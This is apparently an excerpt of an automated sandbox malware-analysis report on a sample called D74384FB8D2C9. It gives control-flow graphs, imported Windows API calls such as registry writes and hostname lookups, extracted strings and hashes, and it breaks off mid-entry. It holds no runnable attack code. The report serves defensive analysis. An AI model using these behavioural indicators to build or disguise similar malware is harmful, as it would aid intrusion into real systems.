                                                                                  control_flow_graph 295 409bf0-409c0f call 408640 298 409c11-409c19 IWBE 295->298 299 409c34-409c3b 295->299 298->299 300 409c1b-409c2f 298->300 301 409c60-409c7b call 44b132 299->301 302 409c3d-409c45 IHJDE 299->302 303 40a0e1-40a0ee call 469914 300->303 309 409ca1-409ca8 301->309 310 409c7d-409c86 INSHDY 301->310 302->301 304 409c47-409c5b 302->304 304->303 312 409caa-409cb1 309->312 313 409cbc-409cd0 309->313 310->309 311 409c88-409c9c 310->311 311->303 312->313 314 409cb3-409cba 312->314 313->303 314->313 315 409cd5-409cf0 call 409b20 call 40be40 314->315 320 409cf2-409d41 315->320 321 409d46-409d4d call 40be00 315->321 322 409de1-409f14 _memset * 3 call 40b090 call 46b0a0 call 40be40 320->322 325 409d92-409ddb 321->325 326 409d4f-409d90 321->326 334 409f42-409f6a 322->334 335 409f16-409f40 322->335 325->322 326->322 338 409f6c-409fab call 40a8d0 INSHD 334->338 335->338 341 409fb1-409fbc 338->341 342 40a077-40a0de _memset * 2 GSDNP call 409a80 338->342 346 409fc2-409fc9 341->346 347 40a075 341->347 342->303 346->347 349 409fcf-409fd6 346->349 347->303 349->347 350 409fdc-40a03b _memset * 2 GSDNP call 40bb20 349->350 353 40a04a-40a060 call 40a8d0 350->353 354 40a03d-40a049 350->354 357 40a065-40a06f HINSD 353->357 354->353 357->347
                                                                                  APIs
                                                                                  • IWBE.A2F0JLEKS ref: 00409C11
                                                                                  • IHJDE.A2F0JLEKS ref: 00409C3D
                                                                                  • INSHDY.A2F0JLEKS(Function_00008B20,00000000,00000000,00000000,00000000,00000000), ref: 00409C7D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: SysWOW64$loser$loser32$loser64$s$system32$y
                                                                                  • API String ID: 0-4153563467
                                                                                  • Opcode ID: 3dedaa603fdf3090f368fdba66691516e530f15f89106bf06b9d5baa25b54bc1
                                                                                  • Instruction ID: a116d238729e3860eb343d64fc62387cb49321a942347d31f859cfb2a01973d8
                                                                                  • Opcode Fuzzy Hash: 3dedaa603fdf3090f368fdba66691516e530f15f89106bf06b9d5baa25b54bc1
                                                                                  • Instruction Fuzzy Hash: 9CD17370C082589AEB21DB24DC49BDD7BB8AB15708F0401EED548662D2D7BD5FC8CF6A

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • __EH_prolog3_GS.LIBCMT ref: 6A6EF595
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,6A6EF85C,?,?), ref: 6A6EF5C5
                                                                                  • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6A6EF5D9
                                                                                  • ConvertDefaultLocale.KERNEL32(?), ref: 6A6EF615
                                                                                  • ConvertDefaultLocale.KERNEL32(?), ref: 6A6EF623
                                                                                  • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6A6EF640
                                                                                  • ConvertDefaultLocale.KERNEL32(?), ref: 6A6EF66B
                                                                                  • ConvertDefaultLocale.KERNEL32(000003FF), ref: 6A6EF674
                                                                                  • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 6A6EF68D
                                                                                  • EnumResourceLanguagesA.KERNEL32(00000000,00000010,00000001,Function_0001EDDC,?), ref: 6A6EF6AA
                                                                                  • ConvertDefaultLocale.KERNEL32(?), ref: 6A6EF6DD
                                                                                  • ConvertDefaultLocale.KERNEL32(00000000), ref: 6A6EF6E6
                                                                                  • GetModuleFileNameA.KERNEL32(6A6D0000,?,00000105), ref: 6A6EF729
                                                                                  • _memset.LIBCMT ref: 6A6EF749
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource_memset
                                                                                  • String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                  • API String ID: 3537336938-2299501126
                                                                                  • Opcode ID: 2d3bdeea502fa68b5dfbe76a6d8aeb289de6064730eb6543b69ecf7bf84e04a9
                                                                                  • Instruction ID: bd4ddfeff5bfdd7641bcfb2f1dc9955c71ded2dcee33b90c965d629eb2c1d534
                                                                                  • Opcode Fuzzy Hash: 2d3bdeea502fa68b5dfbe76a6d8aeb289de6064730eb6543b69ecf7bf84e04a9
                                                                                  • Instruction Fuzzy Hash: 075146B1D052289BCB65DF65DC44BEDBAF4AF49304F1141EAE958E3280DB748E85CFA0

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$__strlwr$CleanupCloseCreateFileHandleStartup_sprintfgethostname
                                                                                  • String ID: \\.\%s
                                                                                  • API String ID: 2340954306-869905501
                                                                                  • Opcode ID: 1671453f68bed37b371663418db31414ae41cb5666d4f14943dc7d785e614ef4
                                                                                  • Instruction ID: eeecf72eefaa56a3390417bf2e1cde818c65679b3060eb8dc991bada4495a270
                                                                                  • Opcode Fuzzy Hash: 1671453f68bed37b371663418db31414ae41cb5666d4f14943dc7d785e614ef4
                                                                                  • Instruction Fuzzy Hash: 5851D6B25093806FE230D764DC99EDB77EDAB95308F040A69F599C7182FF745A0C86A2

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 605 402a72-402a74 606 402a76-402a7b 605->606 607 402a9a-402a9e 605->607 608 40325e-40326b 606->608 609 4086d4-4086f9 call 4041b2 607->609 610 402aa4-402aa6 607->610 612 403271-40329d call 4027b0 call 403fc0 608->612 613 40150e-40e34a call 40a710 608->613 622 408700-40873a 609->622 623 4086fb 609->623 610->609 613->608 625 408764-408825 _strlen 622->625 626 40873c-40875e _strlen 622->626 627 40883f-40884c call 469914 623->627 629 408827-408830 RegSetValueExA 625->629 632 408835-408839 626->632 629->632 632->627
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 8.8.8.8,114.114.114.114$N$S$a$e$e$e$m$r$r$v
                                                                                  • API String ID: 0-1623589704
                                                                                  • Opcode ID: aaf2cb7604d55b992d57f96f378ebd8cccee3257966581598af2bf552d503187
                                                                                  • Instruction ID: ad76d50b47f46615d966b73d0b2cfb7c7371a30b1c06df112acadf4a47ff12ef
                                                                                  • Opcode Fuzzy Hash: aaf2cb7604d55b992d57f96f378ebd8cccee3257966581598af2bf552d503187
                                                                                  • Instruction Fuzzy Hash: 494137708082D8D9EB16D664C9497DDBFB45F16348F4440CDD5843A2C2C7FE1B99CB66

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 633 433150-433188 call 404390 636 43318f-433193 633->636 637 433195-43319b 636->637 638 43319d-4331a0 636->638 639 4331a3-4331bf _memset 637->639 638->639 640 4331ca-4331d0 639->640 641 4331d2-4331dd 640->641 642 4331df-433213 call 469d0b call 469cd7 _rand 640->642 641->640 648 43321e-433224 642->648 649 433247-43324d 648->649 650 433226-433230 648->650 653 433254-43325a 649->653 654 43324f 649->654 651 433232 650->651 652 433239-433241 650->652 651->652 655 433243 652->655 656 433245 652->656 657 433273-4332d1 _memset call 46b090 _strlen 653->657 658 43325c-433260 653->658 659 4338d3-4338d7 654->659 655->649 656->648 670 4332d3-4332da 657->670 671 4332f0-433367 call 46b0a0 _memset * 2 call 433940 657->671 664 433262-43326c 658->664 665 43326e 658->665 661 4338fa-433912 call 404700 659->661 662 4338d9-4338dd 659->662 676 433929-433936 call 469914 661->676 662->661 666 4338df-4338ed _strlen 662->666 664->657 667 4338c6-4338cd 665->667 666->661 672 4338ef-43391b 666->672 667->642 667->659 670->671 675 4332dc-4332ed call 46b0a0 670->675 687 433369 671->687 688 43336e-433376 call 45087e 671->688 672->636 679 433921-433924 call 404700 672->679 675->671 679->676 687->667 691 43337d-43338d call 450925 688->691 694 433393-43339e call 438160 691->694 695 4334bb-4334c6 call 432ed0 691->695 698 4333a3-4333ab 694->698 699 4334cb-4334de 695->699 700 4333be-4333d8 call 4043f0 698->700 701 4333ad-4333b4 698->701 702 4334e0 699->702 703 4334ea-433504 call 4043f0 699->703 712 4333e9-4333fe 700->712 705 4338b1-4338b8 701->705 707 4338be-4338c1 call 450a5b 702->707 711 433515-43352a 703->711 705->691 705->707 707->667 713 433530-433537 711->713 714 4335d7-4335dd call 404700 711->714 715 433404-43340b 712->715 716 4334ab-4334b6 call 404700 712->716 718 433544 call 44a5b1 713->718 719 433539-433542 713->719 723 4335e2-4335f6 714->723 721 433418 call 44a5b1 715->721 722 43340d-433416 
715->722 716->723 725 433549-43359a call 4068a0 718->725 719->718 719->725 728 43341d-43346e call 4068a0 721->728 722->721 722->728 730 433607-43361c 723->730 742 4335a8-4335b5 _strlen 725->742 743 43359c-4335a6 725->743 736 433470-43347a 728->736 737 43347c-433489 _strlen 728->737 733 433622-433629 730->733 734 433731-433746 730->734 740 433636 call 44a5b1 733->740 741 43362b-433634 733->741 738 433761-433779 734->738 739 433748-43374c 734->739 746 43348f-4334a6 call 4068a0 736->746 737->746 748 433791-43379f 738->748 749 43377b-43378b 738->749 744 43374e-433755 739->744 745 43375c 739->745 747 43363b-433689 call 433a40 740->747 741->740 741->747 751 4335bb-4335d2 call 4068a0 742->751 743->751 744->705 745->707 746->712 771 4336c1-4336c7 call 435f60 747->771 772 43368b-43369b call 435d10 747->772 753 4337a1-4337a5 748->753 754 4337d8-4337dc 748->754 749->748 751->711 758 4337a7-4337ca call 436660 753->758 759 4337d6 753->759 761 433815-433819 754->761 762 4337de-4337e2 754->762 758->759 785 4337cc 758->785 767 433846-43384d 759->767 761->767 768 43381b-43381f 761->768 764 433813 762->764 765 4337e4-4337e8 762->765 764->767 765->764 773 4337ea-433807 call 4366a0 765->773 777 433864-433868 767->777 778 43384f-433853 767->778 768->767 775 433821-43383a call 436730 768->775 783 4336cc-4336d1 771->783 795 4336af-4336ba call 433c30 772->795 796 43369d-4336a8 call 433c30 772->796 773->764 800 433809 773->800 775->767 803 43383c 775->803 780 43386a-43388a call 450a5b call 404700 777->780 781 43388f-4338af call 450a5b call 404700 777->781 786 433860 778->786 787 433855-43385c 778->787 780->676 781->676 792 4336d3-43370d call 436400 call 433c30 783->792 793 433711-43371c call 433c30 783->793 785->759 786->707 787->705 792->734 793->734 795->730 796->734 800->764 803->767
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$_strlen$_rand
                                                                                  • String ID: 8tH$8tH$P
                                                                                  • API String ID: 1639540046-556088726
                                                                                  • Opcode ID: 12b65c612d7ec3cb8c476f6808ec05737540f83b829bd8fd3f25c69714e0270a
                                                                                  • Instruction ID: 1ebf0cffd5504f169992344da7b79c86c68b895f91d5a2556885a10078c10331
                                                                                  • Opcode Fuzzy Hash: 12b65c612d7ec3cb8c476f6808ec05737540f83b829bd8fd3f25c69714e0270a
                                                                                  • Instruction Fuzzy Hash: B42257B0D00218DBDB28DF55D881BEEB7B5BF4830AF1091AAE40967280DB795F85CF59

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$_malloc_strlen
                                                                                  • String ID: vc8
                                                                                  • API String ID: 2291048262-3387903242
                                                                                  • Opcode ID: 4a29b3c7692388b082ac17715db8972c7626a5228ea364a209282d20b576d689
                                                                                  • Instruction ID: 059be9408a10db197b09ab8385bdd689cc510c9f1f5dbe5d3152da61865c8b34
                                                                                  • Opcode Fuzzy Hash: 4a29b3c7692388b082ac17715db8972c7626a5228ea364a209282d20b576d689
                                                                                  • Instruction Fuzzy Hash: 22E11CF1D001189BDB14DB55DD81BEEB778AB54308F0041AEE60977282EB396F88CF5A

                                                                                  Control-flow Graph

                                                                                  • Control-flow graph of the function at 6A6D24F0 (rendered graph with executed / not executed legend; raw edge list omitted)
                                                                                  APIs
                                                                                    • Part of subcall function 6A6D2410: _strncpy.LIBCMT ref: 6A6D246F
                                                                                    • Part of subcall function 6A6D2410: _memset.LIBCMT ref: 6A6D2485
                                                                                    • Part of subcall function 6A6D2410: _sprintf.LIBCMT ref: 6A6D249F
                                                                                  • _memset.LIBCMT ref: 6A6D28BE
                                                                                  • _sprintf.LIBCMT ref: 6A6D28CE
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D28E2
                                                                                  • OutputDebugStringA.KERNEL32(?), ref: 6A6D28FC
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D2903
                                                                                  • _malloc.LIBCMT ref: 6A6D291E
                                                                                  • _memset.LIBCMT ref: 6A6D2930
                                                                                  • _sprintf.LIBCMT ref: 6A6D295F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset_sprintf$DebugOutputString$__wfopen_s_malloc_strncpy
                                                                                  • String ID: C:\pl.txt$current i : %d$total dlq type count : %d
                                                                                  • API String ID: 376268990-2168033949
                                                                                  • Opcode ID: 09fec2591aec6aee3aead2857e2844dc7dd98c78105f4b6e04361782dfd293ca
                                                                                  • Instruction ID: 1846db266f6be575ddef24c4f4a2354300b160b59d825258a1016a4486d01e4d
                                                                                  • Opcode Fuzzy Hash: 09fec2591aec6aee3aead2857e2844dc7dd98c78105f4b6e04361782dfd293ca
                                                                                  • Instruction Fuzzy Hash: E0A1953078430027F3066660CDA6F5A358A9B86B4CF059478EF452F3D3CE9A7E68439B

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D204A
                                                                                  • OutputDebugStringA.KERNEL32(6A71B120), ref: 6A6D205E
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D2065
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D2080
                                                                                  • OutputDebugStringA.KERNEL32(6A71B130), ref: 6A6D2094
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D209B
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D20B9
                                                                                  • OutputDebugStringA.KERNEL32(out), ref: 6A6D20CD
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D20D4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$__wfopen_s
                                                                                  • String ID: C:\pl.txt$out
                                                                                  • API String ID: 4089825709-3113491540
                                                                                  • Opcode ID: 1fc4a73d5d1d7302abc9dc1563f70cccfd79c7b290b9d68c64cb42856f5ecb63
                                                                                  • Instruction ID: 0761f59e90b7a12da5da4bce6e4e6027af3e9dac8691c304d16f4ec5170039b4
                                                                                  • Opcode Fuzzy Hash: 1fc4a73d5d1d7302abc9dc1563f70cccfd79c7b290b9d68c64cb42856f5ecb63
                                                                                  • Instruction Fuzzy Hash: 5A118172808200A7E710EBA1CC48B5B7BF5BBD5254F0A0869F61043251EF75EA4CDB93

                                                                                  Control-flow Graph

                                                                                  • Control-flow graph of the function at 6A6F4780 (rendered graph with executed / not executed legend; raw edge list omitted)
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: __strdup$ExtensionFileFindModuleNamePath_strcat_s
                                                                                  • String ID: .CHM$.HLP$.INI
                                                                                  • API String ID: 1153805871-4017452060
                                                                                  • Opcode ID: 49c5fd6ec3bcdc034c4f15487cecc783fb22369b21e965955324da13ca568843
                                                                                  • Instruction ID: b2ac61e6381d2d11dd1d22411da25095f8caed681d081766d18e25c4a86bf1c6
                                                                                  • Opcode Fuzzy Hash: 49c5fd6ec3bcdc034c4f15487cecc783fb22369b21e965955324da13ca568843
                                                                                  • Instruction Fuzzy Hash: 4F4180B09043199BDB11DBB5CE48B9AB7FDAF05308F010CA9E565D3541EFB4EA85CA60
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Startup__strlwrgethostname
                                                                                  • String ID: D$S$a$e$f$j$s
                                                                                  • API String ID: 3543222892-4186746316
                                                                                  • Opcode ID: 67eeb77a1adf249b73b56470c66b74b5eb4b1cd0800d5418f079310fe3cdeaaa
                                                                                  • Instruction ID: 0abbb77e4ba768782e3414a2fa55f5017c914e71a427ac5e905b19fb27f1aec6
                                                                                  • Opcode Fuzzy Hash: 67eeb77a1adf249b73b56470c66b74b5eb4b1cd0800d5418f079310fe3cdeaaa
                                                                                  • Instruction Fuzzy Hash: 4621607060D7C08FF332962884147DB7FD5DF97348F0809ADE4D98B296DAB5490987A3
                                                                                  APIs
                                                                                  • __time64.LIBCMT ref: 6A6E3D05
                                                                                    • Part of subcall function 6A6FF945: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,6A6E3D0A,00000000), ref: 6A6FF950
                                                                                    • Part of subcall function 6A6FF945: __aulldiv.LIBCMT ref: 6A6FF970
                                                                                    • Part of subcall function 6A6FE2FD: __getptd.LIBCMT ref: 6A6FE302
                                                                                  • _rand.LIBCMT ref: 6A6E3D16
                                                                                    • Part of subcall function 6A6FE30F: __getptd.LIBCMT ref: 6A6FE30F
                                                                                  • _memset.LIBCMT ref: 6A6E3D6A
                                                                                  • _memset.LIBCMT ref: 6A6E3E0D
                                                                                  • _memset.LIBCMT ref: 6A6E3E2A
                                                                                  • WSAStartup.WS2_32(00000202,?), ref: 6A6E3EA5
                                                                                  • gethostbyname.WS2_32(?), ref: 6A6E3EB3
                                                                                  • WSACleanup.WS2_32 ref: 6A6E3EBF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
